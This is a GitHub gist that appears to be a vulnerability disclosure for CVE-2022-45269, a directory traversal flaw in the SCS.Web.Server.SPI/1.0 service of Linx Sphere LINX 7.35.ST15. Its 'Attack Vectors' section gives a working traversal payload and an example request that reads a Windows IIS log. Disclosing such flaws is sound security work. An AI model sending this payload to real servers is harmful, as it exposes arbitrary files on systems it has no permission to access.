Skip to content

Instantly share code, notes, and snippets.

@robotshell
Created December 12, 2022 08:05
Show Gist options
  • Save robotshell/7b97af98c5dc0cacd57e6bfac90019cd to your computer and use it in GitHub Desktop.
Save robotshell/7b97af98c5dc0cacd57e6bfac90019cd to your computer and use it in GitHub Desktop.
CVE-2022-45269
### Description
A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.
### Additional Information
The affected product is mounted on a Windows server with IIS 10.0, therefore, only arbitrary Windows files can be read.
### Vulnerability Type
Directory Traversal
### Vendor of Product
Linx Sphere
### Affected Product Code Base
LINX 7.35.ST15 - Versions affected: < LINX 7.35.ST15
### Affected Component
Service web SCS.Web.Server.SPI/1.0 in port 3000
### Attack Type
Remote
### Impact Information Disclosure
True
### Attack Vectors
To exploit the vulnerability simply requires a remote attacker to use the following payload /.../.../.../.../.../.../.../.../.../.../.../.../.../.../.../.../ and the file he wants to access. Example: http://192.168.1.10:3000/../../../../../../../../../../../../windows/iis.log
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment